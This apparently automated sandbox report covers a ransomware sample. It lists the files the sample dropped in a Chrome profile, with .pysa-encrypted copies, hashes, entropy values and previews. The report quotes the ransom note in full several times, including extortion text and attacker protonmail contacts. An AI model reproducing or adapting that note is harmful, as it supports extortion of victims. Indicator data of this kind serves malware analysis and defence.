                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921461546881062
                  Encrypted:false
                  SSDEEP:384:h1+s11PiP8QYJGY0MzykSGYp5BYGkeTemzDA6gIxwecYrHqUYnW6H+6rKkJ55x:OCpG8QXY0MG7Vp5BsTaDAPOlhjqUYWKD
                  MD5:A799BC47311C363FC690A9F31D0D353A
                  SHA1:8DF4BCD90322B3D6EA635B36E7AD8F6505475471
                  SHA-256:1DF99313CCF49A9DE9C8800E17BA9E7CDA7B87397B1C147204EF822A0821E238
                  SHA-512:7F15632EE1136412F0F41B2B5AB2FF1940C66595FC70ED912B59A4FEF51C48DBC174375F97B9D3A07C806A092A7C3B86C5DEC2AA543DF67FA3CC57589CD3C198
                  Malicious:false
                  Preview: .....D.....A >.Z.*L./.....9d.+..^..T.=.^......w..N......n...HAM.,.;.s.fAi>.DP..dB!......#...`z.;b......%?.......AA$..eHV....r?IE.k!d..|......T.R.jp....1....(..p*...i.T..`.:N."..V?..W8...s..z.0q..5[.5....{'..e.=M=WiJ.a..Az.....P..ac..U.V*X.J.H.+q.).*!..p]n.. .A.|.}.;.G.D!LH....I........C.n..7...{S.H6....V......[..X#.CQ.N.......M.Z;GF5(......7.?}8..~...[.T(21..D...k...u'.o.,....}..Z1.=\..?g!:6..a.'!....%'.I.C...Z.K.......u..[.0k.]V;e....#.....6vt..'..}/.l.10...sH ...^.1... .P..z.....!.y.uS,....#1....j..y...=H.q.B9'......}Nfh4..'E.)...P....H...O1K....@....i6O.....|W.U..@.....<...?2.v." 68z..|W.w........QK..e..O..(|........W9.....J~.].j>W1.QY..?p...i...[.A.....r..........!B.=..h..3]T.......F.Bj.:g.(,...}..f..Q.l#s._.X.M(..6.y].....Lt.\-0.5.u.+.D...Z(}G.{.*...Z.,j1.FG.....M.a..<.........V.U.e.._...!..5.Cg.{...D ...kz/...^=.........i.d..Ok.y.Z.B.... Xj....._..rJ...S.~.......x...PR.3........&.Z..cZ.:.p...^M.v......H..c.....[...Y..l.........=........
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999762540234887
                  Encrypted:true
                  SSDEEP:12288:eJ1CLomgtsAp43sVQxRdF+72fMkqnF0D5PsdXfz5EI3vwkh9sk669PU:u9qAisV4h+7cC1VEI/Zhv6gU
                  MD5:D4C36E57337FA2056EBDDED24D006BA4
                  SHA1:9BBA091FCB291DF821CE1830237A767359B170A1
                  SHA-256:FD580F7F759096EF1FC1B78769DF23D0072B5DC667A5523641D1D20B1AF5FCDC
                  SHA-512:44ED30DAD8773789A81BD2D4A4A90EBFB44D9CFED724EA44511A0494DDFC5C4A0AFE69414A6E069F705864140C7F435FD911C340290AB6FB60F9CE7A7C378D0D
                  Malicious:true
                  Preview: .\.!...P.}......o.z....na...jl..[D6....\(.V$....j)&.=...0.H..@....8O./&6qv.....m.....YK..U.NwVe......>.>A.Is.K.n....l.....s..]....cn. D.f.......Q....D..>b....7....8dUn8.?...LKL.i.Q..."...Er..qS.......KF)B.d.e..B.^E@..\...<...v.xf....S.k2..sc\w.....\...l...y.)...2.N......1.......k.M...a.....q.rG._.'...*\2..........?...Y.x....M/.s.....@..b.....i,....c$......(h.z)..rg.s..7<..h.Bl.sVV..zA%{..Y.79%.....6.g...o.$.!..B.......{.."..".9n...1A....u..?e.a.!89......%J..n.t.%Z.k.........@....5...r...Y.^..9.2L..ZCq.4...;E.*GA...{..ms..pl)!.....A...0R:...GZ..f..S.oI~..[.......Gk~..........sj#....p..3.bS..&...V ........:.}w...8(~..|.sA.k..^5k...'k......I.A.|e..XH...0.c.?...#...P....f~.x...c.HJ(d......F.c..3.a>I..:...]...^JUi.7.....<.05(..+...P,.E*.1..~..%....(....}....;..+.G.....D...G0\.zF..4...yE.y....q..xZ/S..C.....>...c...6...........f....k......h..Y.....c!%SB........lK......DS1^...e..../.,........`w.#...EN.M........Q...9n...R......x..Q.......Au`
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22528
                  Entropy (8bit):7.929208818443082
                  Encrypted:false
                  SSDEEP:384:3zhXrnMeLreKW1H+VnTJwvk9YcZD31sP7T8SlV/G4ROckTgwAjZ742+77:3z1rTWVgLr3GvDD+ZbS4Vn
                  MD5:E3E61934BCFF5A9102DFEFB047872A18
                  SHA1:33E5A018D8D25E1D74AA31A733BD13035F8C4195
                  SHA-256:605EF7A2C0590E69611B828A241A5250963194F8FB9D3FD2BFF3C540B91CF244
                  SHA-512:8F55C9CF63FA5553974ABDB868033F9F3630EE0D624525229F3EBECED597EA4CDA0D47CA687C094E042B46BA0049890D6EFA85DD145D9061F7AE684385F1763E
                  Malicious:false
                  Preview: ...........?{j.l.B.... .|.a!..!z5...A).._..N.....0T......S.n.yY.....I......q..ugM.!z.=.y..!c.5..:...|....2G..E.Q.j-(.!.[.U.8..z.Bu..B.<...t...v/. i.R..`...I{c.0.-.......xs<nM.s".B.];......u..u.U].....n.F...V.{.%.[....a7...91.,<,x.....\z&....c.......i (#3a...;...M.^.e.l..k(..iV.}.F.../.|J.E....I.K.n...,..#.....7...R...h.?..o\.r.a...v.'..<....{.A..........x.i...i_.q%.0{z....'....f......=w....i...g...~..dF2.w..HUn)y..*.=@."...:....Ty.^.L{B^v....Vl..\.X.*.Y.v.^......@.H.....d....0...]$..!.*.......{...:..v\9.l...h......X..0L 3..\.[.o....4.m..F........tR.).(.D..F...I.y...M....y~{+Oc.z.o.o..S.b...[.8.9.p.3)0[.<O.2q...Ko......Zh.........t..huP...:..bD....'.....$.%T..4..!M.2..l/.....D8Y...L.P.A.+.L.....H.G.S;....=.n.?M......s....W..v.L..H....}...`.'..h6(....Jb........7z.....2.......A1..*.....C.R&.....2......f..[..x.@.\...;Q..N^.....XZ.[i.bm...6&..}.Q.z..Vc...Y......h.e.w2..i:9z.E...r...^t....]d.5..o*..|x.......y.m....5*.......]L.Sdk.k.9....c..^<hR...3
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):34816
                  Entropy (8bit):7.964802973838358
                  Encrypted:false
                  SSDEEP:768:DV5yokM7f1HsqgLXodu5OFA1zyuMeNsqGcy9/o2Rg:Ddkaf1gXoduXzjvqz9w2Rg
                  MD5:FFBC3D5DF64512F37318C7E62B876D83
                  SHA1:5BBA2756BC2AD7E2502AF3FF891C4BB49509B6A3
                  SHA-256:02A5F320D54AE4F4609A1D8CA91E654C0E3E83F4010E44F4C6871468EA75EFFA
                  SHA-512:3F34932B5C6451BBA3C8AD4CEE0186E8A2A24BAC3D64A723BF8A23D8BAE480D55A6B7EA5D441A09E008611A675A68D54B87C65BF0D4224C3AE5234E9F8495D5C
                  Malicious:false
                  Preview: ..I1....`W..k.n{._]4Qk.F.0I3.\......*BA....Wtj.....4b._....:.*..9..YlY...5..U.Q\.......Ob..R-u.`.D.....7..RL.]|.H.v..fN..C...w.a....B....;K....6..`D......y<.O._g[Y.E..d......M....q%...A..H.......i.HZwq.D|S.g.w.3b1..WTst..j..K......Aw......A.W..l+G~MD...o3L#.m;...1..J..t8A..S.V..{t...0{...............4.Jh.....w.[k.s.H..e..P.....P)....j..L.7.-w...... BC...7....%."....G#9).K!Z.W...g....0..>N...5.x.1...:..Z....P........#..5...@{.$...t..p.>9q>...K......{lm~|......r.(...............m.Z....s`.bA1t..n.C.d..`&..N../'.).'.}'(a..W.Y.....e....B.>.|..;c(.r.r..*.ZW...Uf...j`..#..j$.Mf..I.-...sL.,.......-;.+.....`..e}......I.G.;.6......9..'G..>p'.......}....G..q'...0......Or.D.S/.Q.)&..3....k.).k.........d.~..Qb...Pb...d.Q..k....;..-x...^.CK...Q..\e.......". ...DQR.d..&n.."..0.<,....F'nO..F...z.......F....d."....#.r..)..../....,..T..$.g.`.....X..B[.MP![..,sM..`r.k..~ytE..|f].$._u..#..M+c.{..\>(^..]..2H%...j.I.v..@ .<...)S.o(........@......V._&.7\..2....e.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.359417813126757
                  Encrypted:false
                  SSDEEP:96:+XskvCQczseZBvSpp3QDsyS+VoY2KMa35qbvbur/2jqk/QEvGnPTRvNxLcGn/Gxn:+cYyZBUADsyS+uKEbjuyGhX9vNxLFeGg
                  MD5:C3D76A3CE25E49F1B194E2A3FD1BED59
                  SHA1:8740DC92475B74D2148A27BC8BD830186DD15153
                  SHA-256:9E48855EE3B5767AFAA4DB1D722677F2F885AA5E28F7913826E2714A3227FAC3
                  SHA-512:2F9AE61B2FECE33659D5899220A0D12C3C1AD909A2829FFC8D3B1D7460C2C2A9F31770B12632BA1B7216F548C9944D45784BF2E7CFCA75B356100B4458F2FF6D
                  Malicious:false
                  Preview: .o..3....l..<;.H.|62.^..N...kmb.)....N|.|......\...C...`..$....!.\v.U..K.O.....~*;,..5.-......Xw.0W.0Y..k....)..1..H.z....C&..18....Yx}%..N...G\r.........I..XP..{U..e...W.i.,....(...y..R.u..n.:Lss.<....D/....u...I.08.U68.c..aP.=.Y..H...UZ.u.).].~.|.ui......3.<*.....}y...<...h.I:...B....K.;...).$.?..,.....^.1M.B.3...d.....fl.4H7../!..5~p.Q8._f.......A..7.._4.r....p(R@;)..^..j.9ch...27......5`a"a...V..R..P.,$.a..<.l.....-..&2..-.....E......y.....x...t.x..i.:.;..1S._..wq.....Y.S&C......0..F.M....K.3..M=^..@........7..DY.20..(.0...[.5C.E....Q.j..?e].^....8.5......FE.@...Y...7?.99n..?.ED..D..1.B..,.....b%>.E...0.."}.q.7._..,....[. .q......]..-.F.P(|..A..+.[W..m.....W...R).........>9.&.c....w.^...z`._.P.lI>.....y.9.F.....Y...b.Xa...9..Rvk.D.l.Y.e8. n..3..D5/D..0Z..L.`......).>_..l....H..nL.......w.aF.....x)p..v......nm..q..CN......a....V.2.t.a.....e.p....Z...n...A..8....Ga.........../..T...O'y...<|.J...^O.......K|..8.Z....tg...*}>...l'.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.99822866649185
                  Encrypted:true
                  SSDEEP:6144:phYP7c6q2wOV7OB0/ScitvlntRfUvlzBO/9:DYPoPOVY0/MLfaFC9
                  MD5:FFD7A19509FED8D46F4ACFF68789438A
                  SHA1:BCA02D442636FCFD52942708D77EFB69293DFF5F
                  SHA-256:438F2B51DA8E24C062C2B002F067B2A513DF998B9EFBEEA4A09AD8FC013D7BA1
                  SHA-512:9D7CD4E84F68009601C93439935BDB664299A54833C74B1D9D8BF5257ABA42D4936AC29D64E233C7B8E8967155CA0AF33EF754561A4A326B452BEEDA7D29E432
                  Malicious:true
                  Preview: 7B..C..P[.6k.}I..#3;.B..P7f....H.^_F\.....U..5~..&..&e.?.-..w.*k.....Z*.V..R.8O..q...A..*r..l....W8.F...b..K...^..^}m..[...>...L.+..%.BP.0..v8Pmz#.l....+.(~x......M.`..(.M.:U._..1.[q.Qa..++.....j.L^4..DRs4|....&.#.1..`EW9..=Z.?@y..K.Q.:"...}NJ../0.hH.B6.R..J6...g.Y..r.....0#.k{L......a...g.M..dC.g.2.n...$.p01.i`.y...%..$.d./.h....K.*k.1..V....../.....7.^..S_.;k....r.Z*....!...n[..N..z5..t...{..M..*.3.~...3Q...]zi......}.A.}...i...u...U.>-h...{LJ....=...P......w{......|.........p.N..F.N*.c.......uZD...-.?9..=6........3...Z..w....(.Af..i......n.["..d...a.(@.0.T.....~.Ul....G....~....iD....{5.(e+.c..........!......#.`..HY.....m...X.g'..............M.6..6}.H..i.<....S.j@..na.vC.....j.4,......C....(_..1y.7..b....k3.!....*u...=1{s....d..}..e.'...^Y.'...b.|.g...........$.........a.?Lqg.&?.9r.~)W......U.d...-.'q.a.......S.Ij.(.....-Bn........SW[.yA...d..)...7.y..q.B..SV.z...<f.x....v..|....8P..j...E..v...>#....`W.f...J..,..........x.....2Y....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):718848
                  Entropy (8bit):7.999664561621181
                  Encrypted:true
                  SSDEEP:12288:rEAmd7L+IhOo7rp4sPTuVYOaXBAKnnKGMOLBmUDbqCN4zhPjhmxq6uMe4K:I3R+c5fpZPTumVxAAVM+fbGhPcqrSK
                  MD5:C61991E115A01894834BD2318E88CA61
                  SHA1:56563DD61B94E81B8399CC3101A2678CB8FD3033
                  SHA-256:C98CD7175DF0022F4AC68FDD2FD547AD0F29BA63193C786E6FEAEC6DB2F5FDF5
                  SHA-512:513E5E1C47868A997EB56217F47DC4C0263A5C55C01EF86E73E5CD198EF9D834E7FD13EADF353DF0B1D55E76F46B535F73F788D8AF4A78E11BDB0FD19150A6A8
                  Malicious:true
                  Preview: .=..?.1H&hu8..r.dW....W".>..8..a..w(;..>..`.....uAM[.:..G>.y..'..W.F.a....#.x?....L..a.fd/....A...a....p.60.`.G.v.L.~pQ..#%Vf[.`L......./.!G......D.j.._..R.:|t....b....R.....`O....x.9..5.*..1?..M.'.(.-.$_G3.lr.+:`r.Rpi..4.....k(S)0.67.`{...F....6z.0..).:...PX.._).~......r.<....j.].A...LBe........MT.G..... .LUV`......e......a.Q.8F..\e..S!\..>.L+...c..'..Vw...3J....7..B^.U ...%.~.6.N.8..o"........,{....-\8.hT.....GG...r....[}.....+.f...g!.f.3B.Y...w.q..z..>.A......H...4Q.f..Vn$5.8....C.b.-.e3......+.|...s....."..1..@.s.?.\.:;G...[.K.&.....!F..F.8.<,.4....A.M.P.t.....L..7./.|.cAt...../]..]..p..."kt..+.."..Z0_O....ww.vo^..O ..".#.|....q-..........".^<..@./-..7.c....T......1E.5C......S........:J._Jgt..@t..3...`...Z......Yz.I...R..'.V....a......=.....7+...n.,.<s./....N.k(...s.9Q..x...BC.#.wi.>.,...r...,W5......g n.....B.^3..r.....c...@..?%.#v`Fi?p...P..#.......*Y@.BQ..._.P}.........!.....\ .C2ux.+..W..u...o.N.4F..,..-.L...f.^.L}...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993927052277338
                  Encrypted:true
                  SSDEEP:1536:ynqxVCSD4vdMxnhbCx5ORzZCO0D65OPsATfsGlKsxathTiHgdeHF46uJNg:ynq7UvqpO+FCJ6QLTHlDOiVl4nJNg
                  MD5:297BB94CB84525A1F86BE83065C6F176
                  SHA1:2E7B5D19DC8A1B77BDCFE7654A6EDC56DB8065E9
                  SHA-256:936A43A4D8E6C1478B18E99F61F67E88A24218848970B2724C3FF4D7BC9FC26A
                  SHA-512:1BC607802E909EBEE6EC5708CA353C205CE1E8002EFC2B3A63EADAF56E07B5F509077D50C54BF9C11A8DBF66A6CCA27DC329EA466766CED899546E8FBE992151
                  Malicious:true
                  Preview: ...(..m:p....h.5.........M..|u.UJ..1.!W....>"....p..~...P.Z..M..)9....&....;...Y2.p.....F..r.yT.).......R.....(...M...k.].2a=.`_t.*..c.......{...hDV..r... ..B..c...........=!..M,Eg..........i|..#4.P..,^L...<K.b.H.g)u....V.v.2.9V{.&...U.<....+G7w.;...K7..+.?.j.".K..(...L.....Q`.U.;.)en.{A.*.KB..3..CA......y...\..y...hS......~GV....($.....IA...r...|pg......%Z...qF;g..)..q..y.v.........:..5#n.....P....r@d..).....7..O...'....j..^H.>..y...`...!...:....a.b....?...V..8....T....r..T+;N...AJ......C}$.?...\..F(.....*..=............a..$,/.NI....ID2b[.xY...<YP..,.....xX.kT.4z....q.L.Tb.b|.M( ..Uj...p..l.|;.@.&U.......$....\7.F..p..k....$.J\.9..W..Y..z..6....A...u..p?|.......}'..,.Q/....G.&$[@W.[.U..w..1.h.L.....o._2.6M..S..d..J...>....Y.sg-....Z.....l2m.i@7....:..x.....,L...M....I.Y..-.......Ph.l.........=..<5.%.....L..q...9.......=.Ht.h..R..A...N.+...`.Bx.t.=..<.E.V....K"l.5%.E..E........H.,.4..Ph.Wd...........].z.?pd..;A=.5{....x...<.|.g.E.;.!..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1148928
                  Entropy (8bit):7.999786326332364
                  Encrypted:true
                  SSDEEP:24576:HYvfCvHbXrfDpBHnoSzGYkX2sw8AOgaz7dC4fRq8W9gs+X22hSWOGawIIDBT:ifCvHbXrflFntibgazx1JXyKG2hVParG
                  MD5:EDD919E03872B02882B59CAC6288197B
                  SHA1:24027EF69E766588D0AA09C481AD6E6759A981C1
                  SHA-256:B4801EA792AEC87CED111F3F2587F398755C5B3194B059642F95A913924EA765
                  SHA-512:94B4853B062401B9AC96DE42466975F8220CEFDB12DC830F03202143C1D2AC8B90E0BCB8E53ED7A856A549279781752606FB6569C83DBE7372E629081AE3A593
                  Malicious:true
                  Preview: d..FZ....../a=|7.(.....uiA..o...w7.....(.U.b*!...|..~.Q....v...b.....MXM_.+7..Z.....a_^{.b...^..#1...I.i....xY..=..m.......X.$m>..[........../..!.&4.v.(|mU.7B.r'~....<E.....{g.d..O[..#.....'.iI..w....GA..z....h.d..C...O..&..6.H..........m.h..E..`......._L....k..:.59W6..r..E.[7.^x9.L/.~...s.....d....k{..QNG.P...H(H...9..&D.... $.3-.LP..u.#.J..;..."..GMb...}..Q.....W^.n........sj.v.*%J'.....~..]......j.jA..bE..V......8v.gy...n...o...i.u..n......wx9.*.l.%...X.]1..4.i.6...9;./....Q>h$.O...M...{...z..Z...2b.x.....E....X.........@]5.....XR..f.J...8..y`....@u.l..2\_.)..uPZ&.....Y..*.m,...2.I.N7.B..rK.|...}. .[...x..*U......Y{m..;I.......{]M.,.._D*..C[.r.....tS.](....@R~]..0_....C..F;..$.?..i]'..Kt@.ov.P...RF>.J.2.fA.....m..+_..[...=!$;...*H..........Q0-_6...G.\ME....KU...72VC.$...............<*q.yF;?....X.5....T?p......3.JE...>..E.e....s.^.f.l......._87...9.4.......\.1...g.%I.F.....1*.T....{c..@k"....../<.y.._./..x..u.&.(..=...O.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9940759669971895
                  Encrypted:true
                  SSDEEP:1536:UJQ/9knQzJbQZeLDsaTPa2eM/4trYxnL+Rg7csiRaHaiSNItPK8P04QgvTvEPkQV:28knAJUZsSo/49Y3iRcQItPQ4Q6DakQV
                  MD5:2D7278DA9AB3F65C523695D8FFBFC101
                  SHA1:8E89281D3631C53AC7E46F99284A4A3261A7F64D
                  SHA-256:73E76AEF29C0795E072BED26FFB9D78E2E8EC84B37C49C5AC2E2A9829696F869
                  SHA-512:2FB1792C54231016D9BF2E748FEA3D39E0E253FB6A5101BC8460CA952C3A353BB3F0282FDC2061746015418C2F3B380904B9BB0616E272FF73014700B4D27C42
                  Malicious:true
                  Preview: ....'..#......L~..%.<.i....Z..|.6....F...=...*.......tS.|..3....0...$..;...Op_..+s.r.i..a..WNq...M.5.6.%.l..)M........*mj.......U9.?......sk....(Ta..:..[..5%]..|. +........D]..QG.......$Il..)..@...n.;.U..........F.........3...p....2^.....R........K.!.f.V..q.N..~......h...j...ii.A....V......^5..K...Dk.V.....h:....T.....b[...c....c...v...E.w^.....y..........?..q.L.."%...Dm.9.G8<...uYF.{D..Zt!).'.....y.K...`R..v..s...B.t>...v0IzPL.|E.......|[...s_...h...l....M.?;.......mm...cB..........1El....(........%.. ..L+.Z..3.x.O.70A.).....)P...\....w..8....a....0....$.k..m.....Q.../..w.....f......"]...`."...<.)."......S.xb'....Y.:+../P..~..1*z+..F...F. .).x.h;.1.....{..J......p.g...e....j..7..r.d.I.....N%H`.u8.C......Ct.jL.i..&.<..~;O......l..S~8...!.X..x.HL.wnN})0}4..%.uK.....#J...|.@b....2.a.r...x..efD..j..<!....t..L...#9..D.)...9;5...|.?.._......N.*?.?..=..{.3.J..1..]...(HTV.^..,.x.....K7,w.JT..d...........y...LF.])meT.N...p....,.......
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14336
                  Entropy (8bit):7.838233781477924
                  Encrypted:false
                  SSDEEP:384:wZdp5Fu26P+ghlR2B0k+XVPgpNn7yr5WUnRrTtEqh:EVk26WIlzXPgpNn7yr0URrCI
                  MD5:47CAFFE40199B58ADE4160658CEFC7E9
                  SHA1:CA9A2CC38023C474A890A669F63475B67CE98B6C
                  SHA-256:CD40F96E5BFE5B4588F5118F447CD9425FD9E638D520039CAE80F175B45EBE94
                  SHA-512:354151925C74013D6268E4A9C554A9F16429F5EF5F7F0DC3B0AEF14ADB58B574507E1A127615A4A98D0004DA4F02161F86DAB22D090F791F15D2BBE33FC1E397
                  Malicious:false
                  Preview: N`.@UVW.}.l....|...In|"..n3T...7a. ..D.0{5p...E.C.....8......Dq8M*.>.t...j... ...m.`0.Q..I.y.T.1.i...&..9.-4......i......m...../.......,_.B..T.9...0.....f..z.I...{:^.V...)<.3,..{.:.G#y.w.......R[...y..}~a..S.T3i......f;.=.Jj..I.O.......EylE..............(.....r.....6.:.o.#.\.~.!.w...e....*P..1..vaU..../.~.t$.`D....M..)f..Z.M...A1..o..S...s..2.y1..T..2.....0.gVw...$.?.i<.iOG.f.l.p.c...G3...p..>I.a.WxW.o*8.rF.w..~..i.3.5d3I.....=q`...(...K.....9.O.?.fG.|..c..l.8....A['...-.....*.;..E.RXOg..=P..\v|cO./gD%......b:s.[2.........,..K.s.Q.0-...=F{.,K...x<.cz...p.....(..#/\.Ms..+.2.S*\K...k.............C.i...0.'X......G.(^......\$0.B...esY."<...$LG.*l...l..6.q..c.-..Y.f.X.8.G.E.ZcL...5.n....nS-u.#......1...(2...J.q........T)@/..p{N.yP...Y.A.o[.j.U.S.....4...#..Cr..%2,p........B;h...h..[.#...'...k...D........M."........S...a~......h.y..}........-..FV..l...8..&%..{8.p.+h..R..<..1..?..sEK..Y..u:(..B..G..3...H........G.I.n....}N...;5......m....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):79872
                  Entropy (8bit):7.991732211014861
                  Encrypted:true
